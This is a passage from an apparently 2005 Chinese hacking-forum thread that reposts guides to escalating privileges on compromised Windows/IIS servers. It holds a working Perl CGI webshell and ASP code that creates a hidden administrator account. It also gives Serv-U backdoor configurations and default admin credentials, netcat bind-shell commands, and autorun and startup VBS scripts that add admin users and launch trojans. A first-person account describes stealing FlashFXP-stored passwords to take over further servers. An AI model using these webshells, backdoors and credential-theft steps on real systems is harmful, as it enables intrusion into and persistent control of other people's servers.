条件是你权限够大,对方连_blank">防火墙也没有。封装个radmin上去,运行,开对方端口,然后radmin上去。本人从来米成功过。,端口到是给对方打开了。
2.paanywhere
C:\\Documents and Settings\\All Users\\Application Data\\Symantec\\pcAnywhere\\ 这里下他的GIF文件,在本地安装pcanywhere上去
3.SAM破解
C:\\WINNT\\system32\\config\\ 下他的SAM 破解之
4.SU密码夺取
C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\
引用:Serv-U,然后本地查看属性,知道路径后,看能否跳转
进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空
[USER=WekweN|1]
Password=
HomeDir=c:\\
TimeOut=600
Maintenance=System
Access1=C:\\|RWAMELCDP
利用SERV-U做一个隐藏的后门
现在大多数的WINDOWS服务器都使用SERV-U做FTP服务器,直到serv-u5.2版为止仍然存在本地权限提升漏洞,在获得了最高控制权限之后,需要留下一个隐蔽的后门,以备我们下次光临。查看,serv-u的帮助文件可知,serv-u提供了一个扩展的接口,通过这个接口可以管理用户的的访问权限。所以我们就很容易就根据这个接口留下一个后门。
下面是我写的一个扩展程序,实现的功能是,如果是帐号lgsr来登陆,就不需要密码,同时把服务器的C:\盘映射到该帐号的主目录,同时赋予lgsr帐号的远程管理权限。
下载地址为:
http://www.yueyong.net/down/ServuBack.rar
安装方法:
ServuBack.rar解压,把servu.dll上传到肉鸡上serv-u安装目录,把打开配置文件ServUDaemon.ini,在文件末尾添加
[EXTERNAL]
ClientCheckDLL1=servu.dll
保存,重新启动,serv-u服务,OK,现在在本地打开SERV-U的管理程序
ServUAdmin.exe,右键新建一个服务器,输入肉鸡的IP地址,帐号lgsr,密码随便填,再填上肉鸡的FTP端口
连接,好了,现在可以远程管理肉鸡上的FTP了,可以随便添加帐号,修改帐号。
另外可以直接用FTP软件用帐号lgsr登陆,密码随便填,就可以访问肉鸡的C盘,上传,修改文件,并具有执行权限。
在肉鸡的SER-U管理程序并不会显示lgsr这个帐号在帐号列表里面,但是当用lgsr帐号连接时时可以看到连接的帐号名和IP地址的
Access1=d:\\|RWAMELCDP
Access1=f:\\|RWAMELCDP
SKEYValues=
这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限
5.c:\\winnt\\system32\\inetsrv\\data\\
引用:就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,然后执行
6.SU溢出提权
这个网上教程N多 不详细讲解了
7.运行Csript
引用:运行"cscript C:\\Inetpub\\AdminScripts\\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限
用这个cscript C:\\Inetpub\\AdminScripts\\adsutil.vbs get w3svc/inprocessisapiapps
查看有特权的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
再将asp.dll加入特权一族
asp.dll是放在c:\\winnt\\system32\\inetsrv\\asp.dll (不同的机子放的位置不一定一样)
我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\\WINNT\\system32\\idq.dll" "C:\\WINNT\\system32\\inetsrv\\httpext.dll" "C:\\WINNT\\system32\\inetsrv\\httpodbc.dll" "C:\\WINNT\\system32\\inetsrv\\ssinc.dll" "C:\\WINNT\\system32\\msw3prt.dll""c:\\winnt\\system32\\inetsrv\\asp.dll"
可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了
8.脚本提权
c:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动"写入bat,vbs
9.VNC
这个是小花的文章 HOHO
默认情况下VNC密码存放在HKCU\\Software\\ORL\\WinVNC3\\Password
我们可以用vncx4
破解它,vncx4使用很简单,只要在命令行下输入
c:\\>vncx4 -W
然后顺序输入上面的每一个十六进制数据,没输完一个回车一次就行了。
10.NC提权
给对方来个NC 但是条件是你要有足够的运行权限 然后把它反弹到自己的电脑上 HOHO OK了
11.工程学之GUEST提权
很简单 查看他的拥护 一般来说 看到帐户以后 密码尽量猜可能用户密码一样 也可能是他QQ号 邮箱号 手机号 尽量看看 HOHO
12.IPC空连接
如果对方真比较白痴的话 扫他的IPC 如果运气好还是弱口令
13.替换服务
这个不用说了吧?个人感觉相当复杂
14.autorun .inf
autorun=xxx.exe 这个=后面自己写 HOHO 加上只读、系统、隐藏属性 传到哪个盘都可以的 不相信他不运行
15.desktop.ini与Folder.htt
引用:首先,我们现在本地建立一个文件夹,名字不重要,进入它,在空白处点右键,选择“自定义文件夹”(xp好像是不行的)一直下点,默认即可。完成后,你就会看到在此目录下多了两个名为Folder setting的文件架与desktop.ini的文件,(如果你看不到,先取消“隐藏受保护的*作系统文件”)然后我们在Folder setting目录下找到Folder.htt文件,记事本打开,在任意地方加入以下代码: 然后你将你的后门文件放在Folder setting目录下,把此目录与desktop.ini一起上传到对方任意一个目录下,就可以了,只要等管理员浏览了此目录,它就执行了我们的后门
16.su覆盖提权
本地安装个su,将你自己的ServUDaemon.ini文件用从他那下载下来的ServUDaemon.ini 覆盖掉,重起一下Serv-U,于是你上面的所有配置都与他的一模一样了
17.SU转发端口
43958这个是 Serv -U 的本地管理端口。FPIPE.exe上传他,执行命令: Fpipe –v –l 3333 –r 43958 127.0.0.1 意思是将4444端口映射到43958端口上。 然后就可以在本地安装一个Serv-u,新建一个服务器,IP填对方IP,帐号为LocalAdministrator 密码为#1@$ak#.1k;0@p 连接上后你就可以管理他的Serv-u了
18.SQL帐户密码泄露
如果对方开了MSSQL服务器,我们就可以通过用SQL连接器加管理员帐号(可以从他的连接数据库的ASP文件中看到),因为MSSQL是默认的SYSTEM权限。
引用:对方没有删除xp_cmdshell 方法:使用Sqlexec.exe,在host 一栏中填入对方IP,User与Pass中填入你所得到的用户名与密码。format选择xp_cmdshell”%s”即可。然后点击connect,连接上后就可以在CMD一栏中输入你想要的CMD命令了
19.asp.dll
引用:因为asp.dll是放在c:\\winnt\\system32\\inetsrv\\asp.dll (不同的机子放的位置不一定相同)
我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\\WINNT\\system32\\idq.dll" "C:\\WINNT\\system32\\inetsrv\\httpext.dll" "C:\\WINNT\\system32\\inetsrv\\httpodbc.dll" "C:\\WINNT\\system32\\inetsrv\\ssinc.dll" "C:\\WINNT\\system32\\msw3prt.dll""c:\\winnt\\system32\\inetsrv\\asp.dll"
好了,现在你可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去
了,注意,用法中的get和set,一个是查看一个是设置.还有就是你运行上面的你要到C:\\Inetpub\\AdminScripts>这个目录下.
那么如果你是一个管理员,你的机子被人用这招把asp提升为system权限,那么,这时,防的方法就是把asp.dll T出特权一族,也就是用set这个命令,覆盖掉刚才的那些东东.
20.Magic Winmail
前提是你要有个webshell 引用:_blank>http://www.eviloctal.com/forum/read.php?tid=3587这里去看吧
21.DBO……
其实 提升权限的方式很多的 就看大家怎么利用了 HOHO加油吧 将服务器控制到底!
[此贴子已经被作者于2005-6-23 23:29:59编辑过]
--------------------------------------------------------------------------------
-- 作者:右边草
-- 发布时间:2005-6-21 8:28:38
--
这是什么?
--------------------------------------------------------------------------------
-- 作者:lobo
-- 发布时间:2005-6-23 23:30:14
--
转自http://blog.77169.com/cat
提升权限终极技巧
作者:黑狼
个人总结如下:
1: C:\\Documents and Settings\\All Users\\Application Data\\Symantec\\pcAnywhere\
3.C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\
如果有权限修改ServUDaemon.ini,加个用户上去,密码为空
[USER=WekweN|1]
Password=
HomeDir=c:\\
TimeOut=600
Maintenance=System
Access1=C:\\|RWAMELCDP
Access1=d:\\|RWAMELCDP
Access1=f:\\|RWAMELCDP
SKEYValues=
这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限
4.c:\\winnt\\system32\\inetsrv\\data\
5.看能否跳转到如下目录
c:\\php, 用phpspy
c:\\prel,有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell
#!/usr/bin/perl
binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html\\r\\n\\r\\n", 27);
$_ = $ENV{QUERY_STRING};
s/%20/ /ig;
s/%2f/\\//ig;
$execthis = $_;
syswrite(STDOUT, "
\\r\\n", 13);\\r\\n", 17);
open(STDERR, ">&STDOUT") || die "Can\'t redirect STDERR";
system($execthis);
syswrite(STDOUT, "\\r\\n
close(STDERR);
close(STDOUT);
exit;
保存为cgi执行,
如果不行,可以试试 pl 扩展呢,把刚才的 cgi 文件改为 pl 文件,提交 _blank>http://anyhost//cmd.pl?dir
显示"拒绝访问",表示可以执行了!马上提交:先的上传个su.exe(ser-u提升权限的工具)到 prel的bin目录
_blank>http://anyhost//cmd.pl?c\\perl\\bin\\su.exe
返回:
Serv-u >3.x Local Exploit by xiaolu
USAGE: serv-u.exe "command"
Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"
现在是 IUSR 权限,提交:
_blank>http://anyhost//cmd.pl?c\\perl\\bin\\su.exe "cacls.ex ... /G everyone:F"
_blank>http://anyhost//cmd.pl?c\\perl\\bin\\su.exe "cacls.ex ... /G everyone:F"
_blank>http://anyhost//cmd.pl?c\\perl\\bin\\su.exe "cacls.ex ... /G everyone:F"
_blank>http://anyhost//cmd.pl?c\\perl\\bin\\su.exe "cacls.ex ... /G everyone:F"
这样所有分区为everyone完全控制
现在我们把自己的用户提升为管理员:
_blank>http://anyhost//cmd.pl?c\\perl\\bin\\su.exe " net l ... s IUSR_anyhost /add"
6.可以成功运行"cscript C:\\Inetpub\\AdminScripts\\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限
用这个cscript C:\\Inetpub\\AdminScripts\\adsutil.vbs get w3svc/inprocessisapiapps
查看有特权的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
再将asp.dll加入特权一族
asp.dll是放在c:\\winnt\\system32\\inetsrv\\asp.dll (不同的机子放的位置不一定一样)
我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\\WINNT\\system32\\idq.dll" "C:\\WINNT\\system32\\inetsrv\\httpext.dll" "C:\\WINNT\\system32\\inetsrv\\httpodbc.dll" "C:\\WINNT\\system32\\inetsrv\\ssinc.dll" "C:\\WINNT\\system32\\msw3prt.dll""c:\\winnt\\system32\\inetsrv\\asp.dll"
可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了
7.还可以用这段代码试提升,好象效果不明显
<%@codepage=936%><%Response.Expires=0
on error resume next
Session.TimeOut=50
Server.ScriptTimeout=3000
set lp=Server.createObject("WSCRIPT.NETWORK")
oz="WinNT://"&lp.ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz&"/Administrators,group")
Set od=ob.create("user","an85$")
od.SetPassword "an85" <-----密码
od.SetInfo
Set of=GetObject(oz&"/an85$,user")
oe.Add(of.ADsPath)
Response.write "一个超级帐号建立成功!"%>
用这段代码检查是否提升成功
<%@codepage=936%>
<%Response.Expires=0
on error resume next \'查找Administrators组帐号
Set tN=server.createObject("Wscript.Network")
Set objGroup=GetObject("WinNT://"&tN.ComputerName&"/Administrators,group")
For Each admin in objGroup.Members
Response.write admin.Name&"
"
Next
if err then
Response.write "不行啊:Wscript.Network"
end if
%>
8.C:\\Program Files\\Java Web Start\\
这里如果可以,一般很小,可以尝试用jsp的webshell,听说权限很小,本人没有遇见过。
9.最后了,如果主机设置很变态,可以试下在c:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动"写入bat,vbs等木马。
等到主机重启或者你ddos逼它重启,来达到权限提升的目的。
总结起来说就是,找到有执行和写入的目录,管他什么目录,然后上传提升工具,最后执行,三个字"找" "上""执"
以上是本人的拙见,大家有什么好的方法多多分享
通过webshell获得admin全攻略 话说到花了九牛二虎的力气获得了一个webshell,
当然还想继续获得整个服务器的admin权限,正如不想得到admin的不是好黑客~
嘻嘻~~好跟我来,看看有什么可以利用的来提升权限
****************************************************************************
第一
如果服务器上有装了pcanywhere服务端,管理员为了管理方便
也给了我们方便,到系统盘的Documents and Settings/All Us
ers/Application Data/Symantec/pcAnywhere/中下载*.cif本地
破解就使用pcanywhere连接就ok了
****************************************************************************
第二
有很多小黑问我这么把webshell的iis user权限提升
一般服务器的管理都是本机设计完毕然后上传到空间里,那么就会用到ftp,服务
器使用最多的就是servu
那么我们就利用servu来提升权限
通过servu提升权限需要servu安装目录可写~
好开始把,首先通过webshell访问servu安装文件夹下的ServUDaemon.ini把他下载
下来,然后在本机上安装一个servu把ServUDaemon.ini放到本地安装文件夹下覆盖,
启动servu添加了一个用户,设置为系统管理员,目录C:\,具有可执行权限
然后去servu安装目录里把ServUDaemon.ini更换服务器上的。
用我新建的用户和密码连接~
好的,还是连上了
ftp
ftp>open ip
Connected to ip.
220 Serv-U FTP Server v5.0.0.4 for WinSock ready...
User (ip:(none)): id //刚才添加的用户
331 User name okay, please send complete E-mail address as password.
Password:password //密码
230 User logged in, proceed.
ftp> cd winnt //进入win2k的winnt目录
250 Directory changed to /WINNT
ftp>cd system32 //进入system32目录
250 Directory changed to /WINNT/system32
ftp>quote site exec net.exe user rover rover1234 /add //利用系统的net.exe
文件加用户。
如果提示没有权限,那我们就
把后门(server.exe) 传他system32目录
然后写一个VBs教本
set wshshell=createobject ("wscript.shell")
a=wshshell.run ("cmd.exe /c net user user pass /add",0)
b=wshshell.run ("cmd.exe /c net localgroup Administrators user /add",0)
b=wshshell.run ("cmd.exe /c server.exe",0)
存为xx.vbe
这个教本的作用是建立user用户密码为pass
并且提升为管理员
然后执行system32目录下的server.exe
把这个教本传他 C:\Documents and Settings\All Users\「开始」菜单\程序\启动
目录
这样管理员只要一登陆就会执行那个教本.
接下来就是等了.等他登陆.
****************************************************************************
第三
就是先检查有什么系统服务,或者随系统启动自动启动的程序和管理员经常使用的软件,
比如诺顿,VAdministrator,金山,瑞星,WinRAR甚至QQ之类的,是否可以写,如果可以就修改其程序,
绑定一个批处理或者VBS,然后还是等待服务器重启。
****************************************************************************
第四
查找conn和config ,pass这类型的文件看能否得到sa或者mysql的相关密码,可能会有所
收获等等。
****************************************************************************
第五
使用Flashfxp也能提升权限,但是成功率就看你自己的运气了
首先找到FlashFXP文件夹,打开(编辑)Sites. dat,这个文件这是什么东西密码和用户名,
而且密码是加了密的。
如果我把这些文件copy回本地也就是我的计算机中,替换我本地的相应文件。然后会发现
打开flashfxp在站点中打开站点管理器一样。又可以添加N多肉鸡啦~~嘻嘻~
唔??不对啊,是来提升权限的啊,晕,接着来别半途而废。
大家看看对方管理员的这站点管理器,有用户名和密码,密码是星号的。经过用xp星号密码
查看器查看,然后和Sites.dat中加密了密码做比较发现并未加密而是查到的密码是明文显示,
然后最终把这个网站管理员的密码从这堆东西中找
出来。那么下一步就可以链接这些新的服务器啦~~
经过测试只要把含有密码和用户名的Sites.dat文件替换到本地相应的文件就可以在本地
还原对方管理员的各个站点的密码。
****************************************************************************
第五
WIN2K+IIS5.0默认情况下应用程序保护选项是"中(共用的)",这时IIS加载isapi是用的
iwam_computername用户身份执行。
但默认情况下WIN2K+IIS5对于一些特殊isapi又要以system身份加载。win2k+iis5 、
win2k+iis5+sp1、win2k+iis5+sp2都是简单的判断isapi的文件名,并且没有做目录限制,
以SYSTEM权限加载的isapi有:
1、 idq.dll
2、 httpext.dll
3、 httpodbc.dll
4、 ssinc.dll
5、 msw3prt.dll
6、 author.dll
7、 admin.dll
8、 shtml.dll
9、 sspifilt.dll
10、compfilt.dll
11、pwsdata.dll
12、md5filt.dll
13、fpexedll.dll
所以利用这很容易得到SYSTEM权限。并且判断文件名的时候有个bug,比如请求/scripts/test
%81%5cssinc.dll也将会认为是请求的ssinc.dll,就是分离文件路径的时候没有考虑到双字节的
远东版问题。ssinc.dll在处理包含文件路径的时候也有一个问题,就是"/"、"\"只识别了一个
"/",所以如果请求里面使用"\",就会错误的处理包含文件路径,有可能泄露东西或者出现权限
漏洞,这种漏洞很多别的地方( php、asp等)也还存在。
加载这些isapi不是单以文件名做依据了,而是加了路径,应该是修正了此问题。
一般默认情况下是:
1、 idq.dll d:\winnt\system32\idq.dll
2、 httpext.dll d:\winnt\system32\inetsrv\httpext.dll
3、 httpodbc.dll d:\winnt\system32\inetsrv\httpodbc.dll
4、 ssinc.dll d:\winnt\system32\inrtsrv\ssinc.dll
5、 msw3prt.dll d:\winnt\system32\msw3prt.dll
6、 author.dll D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\_vti_aut\author.dll
7、 admin.dll D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\_vti_adm\admin.dll
8、 shtml.dll D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\shtml.dll
9、 sspifilt.dll d:\winnt\system32\inetsrv\sspifilt.dll
10、compfilt.dll d:\winnt\system32\inetsrv\compfilt.dll
11、pwsdata.dll d:\winnt\system32\inetsrv\pwsdata.dll
12、md5filt.dll d:\winnt\system32\inetsrv\md5filt.dll
13、fpexedll.dll D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bin\fpexedll.dll
正常情况下这些路径都guest不能写,但如果配置不好,这些路径iis user能够写了就一样可以提升权限了
可以把ISAPIHack.dll上传到IIS的可执行目录,文件名可叫ssinc.dll或者admin.dll等(上面列的13个文件名之一)。
然后等待IIS重启加载此dll,就可以获得权限了
****************************************************************************
第六
下载系统的 %windir%\repair\sam.*(WinNT 4下是sam._ 而Windows 2000下是sam)文件,
然后用L0pht等软件进行破解,只要能拿到,肯花时间,就一定可以破解。
****************************************************************************
第七
PipeUpAdmin(Windows 2000下), 在本机运行可以把当前用户帐号加入管理员组。普通用户
和Guests组用户都可以成功运行。
****************************************************************************
第八
Serv-u Ftp Server 本地权限提升漏洞:
很多主机的C:\Documents and Settings\All Users\ Documents目录以
及下边几个子目录Documents没有设置权限,导致可以在这个目录上传并
运行Exp.
直接上传了serv-u local exploit 和nc,
并且把serv-u的本地提升权限的名字命名为su.exe
文件就放在C:\Documents and Settings\All Users\ Documents,
然后我们用su.exe直接建立用户,也可以反弹一个shell过来的。
具体命令:
建立用户: serv-u.exe "cmd"
>USER xl
>PASS 111111
反弹shell: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"
WEBSHELL权限提升
动网上传漏洞,相信大家拿下不少肉鸡吧,但是都是WEBSHELL,不能拿到系统权限,要如何拿到系统权限呢?这正是我们这次要讨论的内容
OK,进入我的WEBSHELL
啊哈,不错,双CPU,速度应该跟的上,不拿下你我怎么甘心啊
输入密码,进入到里面看看,有什么好东西没有,翻了下,好像也没有什么特别的东西,看看能不能进到其他的盘符,点了下C盘,不错不错,可以进去,这样提升就大有希望了
一 serv-u提升
OK,看看他的PROGRAME里面有些什么程序,哦,有SERV-U,记得有次看到SERV-U有默认的用户名和密码,但是监听的端口是43958,而且是只有本地才能访问的,但是我们有端口转发工具的啊,不怕。先看看他的SERV-U的版本是多少,telnet XXX.XXX.XXX.XXX 21
显示竟然是3.0的,唉,不得不说这个管理员真的不称职。后来完毕后扫描了下,也只有FTP的洞没有补。既然是这样,我们就开始我们的提升权限了
上传FPIPE,端口转发工具, 图三
在运行CMD命令里输入d:\wwwroot\fpipe.exe -v -l 81 -r 43958 127.0.0.1 意思是把本机的43598端口转发到81端口
然后打开我们自己机子上的SERV-U,点Serv-U服务器,点菜单栏上的的服务器,点新建服务器,然后输入IP,输入端口,记得端口是刚刚我们转发的81端口。服务名称随便你喜欢,怎么样都行。然后是用户名:LocalAdministrator 密码:#l@$ak#.lk;0@P (密码都是字母)
确定,然后点刚刚建的服务器,然后就可以看到已有的用户,自己新建一个用户,把所有权限加上。也不锁定根目录
接下来就是登陆了,登陆FTP一定要在CMD下登陆,
进入后一般命令和DOS一样,添加用户的时候
ftp>quote site exec net.exe user hk pass /add
ftp>quote site exec net.exe localgroup administrators hk/add
如果对方开了3389的话,就不用我教你怎么做了,没开的话,新建立IPC连接,在上传木马或者是开启3389的工具
二
auto.ini 加 SHELL.VBS
autorun.inf
[autorun]
open=shell.vbs
shell.vbs
dim wsh
set wsh=CreateObject("WScript.Shell")
wsh.run "net user guest /active:yes",0
wsh.run "net user guest 520ls",0
wsh.run "net localgroup administrators guest /add",0
wsh.run "net user hkbme 520ls /add",0
wsh.run "net localgroup administrators hkbme /add",0
wsh.run "cmd.exe /c del autorun.inf",0
wsh.run "cmd.exe /c del shell.vbs",0
但是这样要可以访问到对方的根目录。将这两个文件放到对方硬盘的根目录下。当然你也可以直接执行木马程序,还要一个木马程序,但是语句就和最后两句一样,通过CMD执行木马程序
三
Folder.htt与desktop.ini
将改写的Folder.htt与desktop.ini,还有你的木马或者是VBS或者是什么,放到对方管理员最可能浏览的目录下,觉得一个不够,可以多放几个
Folder.htt添加代码
但是后门和这两个文件必须要放到一块,有点问题,可以结合启动VBS,运行结束后,删除上传的后门.就是CODEBASE="shell.vbs".shell写法如上
四
replace
替换法,可以替换正在执行的文件。用这个几乎可以马上得到权限,但是我没有做过试验,可以试下,将对方正在执行的文件替换为和它文件名一样的,捆绑了木马的。为什么不直接替换木马呢?如果替换的是关键程序,那不是就直接挂了?所以还是捆绑好点
格式
REPLACE [drive1:][path1]filename [drive2:][path2] [/A]
[/R] [/W]
REPLACE [drive1:][path1]filename [drive2:][path2]
[/R] [/S] [/W]
[drive1:][path1]filename 指定源文件。
[drive2:][path2] 指定要替换文件的
目录。
/A 把新文件加入目标目录。不能和
/S 或 /U 命令行开关搭配使用。
/P 替换文件或加入源文件之前会先提示您
进行确认。
/R 替换只读文件以及未受保护的
文件。
/S 替换目标目录中所有子目录的文件。
不能与 /A 命令选项
搭配使用。
/W 等您插入磁盘以后再运行。
/U 只会替换或更新比源文件日期早的文件。
不能与 /A 命令行开关搭配使用
这个命令没有试验过,看能不能替换不能访问的文件夹下的文件,大家可以试验下
五
脚本
编写一个启动/关机脚本配置文件scripts.ini,这个文件名是固定的,不能改变。内容如下:
[Startup]
0CmdLine=a.bat
0Parameters=
将文件scripts.ini保存到"C:\winnt\system32\GroupPolicy\Machine\Scripts"
A.BAT的内容可以是NET USER yonghu mima
也可以是NET USER ADMINistrator XXX
这样可以恢复你想要得任意用户名的密码,也可以自己增加新的用户,但是要依赖重启,还有就是对SYSTEM32有写的权限
六
SAM
如果可以访问对方的SYSTEM32的话,删除对方的SAM文件,等他重启以后就是ADMIN用户密码为空
突然又有了想法,可以用REPLACE命令替换的吗,可以把你的SAM文件提取出来,上传到他的任意目录下,然后替换。不过不知道如果对SYSTEM32没有权限访问的话,能不能实现替换
使用FlashFXP来提升权限 最近各位一定得到不少肉鸡吧:),从前段时间的动网的upfile漏洞, 动力文章系统最新漏洞到first see发现的动网sql版本的一个超级大漏洞。有人一定忙的不易乐乎,大家的方法也不过是使用一下asp脚本的后门罢了。至于提 升权限的问题 呵呵,很少有人能作一口气完成。关键还是在提升权限上做个问题上,不少服务器设置的很BT,你的asp木马可能都用不了,还那里 来的提升啊。我们得到webshell也就是个低级别的用户的权限,各种提升权限方法是可谓五花八门啊,如何提升就看你自己的妙 招了。
其一,如果服务器上有装了pcanywhere服务端,管理员为了便于管理也给了我们方便,到系统盘的Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/中下载*.cif本地破解就使用pcanywhere连接就ok了。
其二,如果对方有Serv-U大家不要骂我啊,通过修改ServUDaemon.ini和fpipe这软件提升权限应该是不成问 题吧。
其三,通过替换系统服务来提升。
其四,查找conn和config这类型的文件看能否得到sa或者mysql的相关密码,可能会有所收获等等。
本人在一次无聊的入侵过程中发现了这个方法,使用Flashfxp也能提升权限,但是成功率高不高就看你自己的运气了:)
本人在www.xxx.com 通过bbs得到了一个webshell,放了个小马(现在海阳的名气太大了偶不敢放),而且已经将一段代码插入了N个文件中,够 黑吧。提升权限没时间做。在我放假回家后,一看我晕bbs升级到动网sp2了我放的小马也被K了,人家的BBS是access版 本的。郁闷啊!突然想起我将一个页面插入了asp的后门,看看还有没有希望了。输入www.xxx.com/xx.asp?id =1 好家伙,还在!高兴ing
图1
于是上传了一个asp的脚本的后门,怎么提升权限呢?
在这个网站的主机上游荡了N分钟,在C:\ Program Files下发现了FlashFXP文件夹(跟我一样使用这个软件自己心里暗想)图2,于是就打了了Sites. dat这个文件(编辑)这是什么东西密码和用户名,而且密码是加了密的。
如果我把这些文件copy回本地也就是我的计算机中,替换我本地的相应文件会怎么样呢?
于是我就将Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak几个文件下载到我的计算机中替换了我电脑中flashfxp文件夹的相应文件。打开flashfxp 在站点中打开站点管理器一项。乖 乖发财了
对方管理员通过flashfxp连接的各个站点都在图3,点击连接。通过了于是我们又有了一堆肉鸡,我们有ftp权限。上传脚本 木马~ 呵呵。
说了半天这提升权限的事情一点没讲啊
不要急,大家看看对方管理员的这站点管理器,有用户名和密码,密码是星号的。可惜啊!
又想起了在Sites.dat中也显示了密码和用户名,而且密码是加密的。
现在的星号密码会不会也是加了密的?看看就行了呗。
怎么看? 菜鸟了吧 手头有个不错的查看星号的软件,就是xp星号密码查看器,通过查看跟Sites.dat中加密了密码做比较。看图4和图5 的比较 很显然在站点管理器中查看到的密码是明文显示的。发财了吧
下一步就是使用xp星号密码查看器这个软件来提取密码和用户名。看者这些复杂的密码,还真有点怀念当年玩sniff的时光。呵呵
密码为:b69ujkq6 hyndai790 s584p*fv4-c+ 98cq3jk4 3-8*ef./2z5+
用户名:bn7865t nilei75 qm/-g57+3kn qm/-g57+3kn 5.e*82/+69
(上述部分密码和用户名已经作了必要的修改)
这么多的信息,按工程学的概念来说,没有管理员的密码。打死我也不相信。最终我得到了这个网站管理员的密码从这堆东西中找到 的。
我想这个问题应该反馈到flashfxp官方,让他们在下个版本中修正这个漏洞或者说是错误。经过后来测试只要把含有密码和用户 名的Sites.dat文件替换到本地相应的文件就可以在本地还原对方管理员的各个站点的密码。希望大家在入侵的时候遇到fla shfxp的时候能想到这个方法,至少也可以得到一堆新的肉鸡。不防试试?希望能给大家渗透带来帮助。
将asp权限提到最高by: cnqing from:http://friend.91eb.com
本来是要写个提权asp木马的,可惜时间不是太多功底也不是太深。先把原理方法告诉大家好了。简单说说,说的太麻烦没有必要。懂了就行。
原理:
asp文件的教本解释是由asp.dll运行的。由dllhost.exe启动的。身分是IWAN_NAME。若是把asp.dll放到inprocesslsapiapps中那它就是由inetifo.exe直接启动。身份是system
方法:
第一步。
得到inprocesslsapiapps内容,用命令"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"。将得到的一组dll复制下来。
第二步
写一个bat内容为"cscript C:\Inetpub\AdminScripts\adsutil vbs set w3svc/inprpocessisapiapps "C:\Inetpub\AdminScripts\asp.dll" ·····
省略号为复制下的内容。中间用空格分开不要带回车符
最后运行这个bat就行了。
例如:
我用"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"得到
"c:\winnt\system32\inetsrv\httpext.dll"
"c:\winnt\system32\inetsrv\httpodbc.dll"
"C:\WINNT\system32\inetsrv\ssinc.dll"
"C:\WINNT\System32\msw3prt.dll"
"C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\isapi\_vti_aut\author.dll"
"C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\isapi\_vti_adm\admin.dll"
"C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\isapi\shtml.dll"
那么你的bat就应该是:
cscript C:\Inetpub\AdminScripts\adsutil vbs set w3svc/inprpocessisapiapps "C:\Inetpub\AdminScripts\asp.dll" "c:\winnt\system32\inetsrv\httpext.dll" "c:\winnt\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\System32\msw3prt.dll" "C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\isapi\_vti_aut\author.dll" "C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\isapi\_vti_adm\admin.dll" "C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\isapi\shtml.dll"
已测试成功!!
利用%5c绕过验证
利用%5c绕过验证
---------------------------------------
lake2(http://mrhupo.126.com)
2004-11-27
---------------------------------------
说到%5c,你是不是想起了当前流行的那个%5c暴库漏洞,呵呵,本文就是对%5c利用的探索(呵呵,当然有我提出的新东东,或许对你有帮助哦^_^)。
好,我们先追根溯源,找到那个漏洞的老底。看看绿盟2001年的漏洞公告:http://www.nsfocus.net/index.php?ac...iew&bug_id=1429
N年以前利用这个漏洞可以实现目录遍历,虽然微软出了补丁,不过好像补丁是用来限制iis只能访问虚拟目录的,所以漏洞还是存在,只不过利用方式变了。对iis来说,提交一个含有%5c的url能够找到文件,但是该文件里以相对路径引用的其他文件却找不到了(%5c是\的url编码,iis跳转到上一级目录去找,当然找不到;头晕了吧,哈哈,我也头晕啊)。
后来这个漏洞就被牛人挖掘出来了,也就是传说中的%5c暴库:由于连接数据库的文件引用的相对路径,提交%5c找不到文件,所以导致出错,iis就会老老实实的说出数据库的路径(不明白?找google)。
一个偶然的机会我发现还可以利用%5c绕过asp的验证;当我们暴库失败的时候不妨试试。
废话少说,看下面的代码:
<%
guest_user=trim(request("guest_user"))
guest_password=trim(request("guest_password"))
Set rs= Server.CreateObject("ADODB.Recordset")
sql="select * from admin where id=1"
rs.open sql,conn,3,2
readuser=rs("guest_user")
readpassword=rs("guest_password")
if readuser<>guest_user or readpassword<>guest_password then
response.write "请输入正确地管理员密码!"
response.end
else
session("admin")=1 '登陆后写入seesion中保存
response.write("登陆成功,请返回信息页")
end if
%>
看到没有,要想通过验证必须让数据库里的用户名密码与提交的一致;想到什么?让我们再看看数据库连接文件代码:
<%
on error resume next
set conn=server.createobject("adodb.connection")
DBPath = Server.MapPath("guestbook.asp")
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
%>
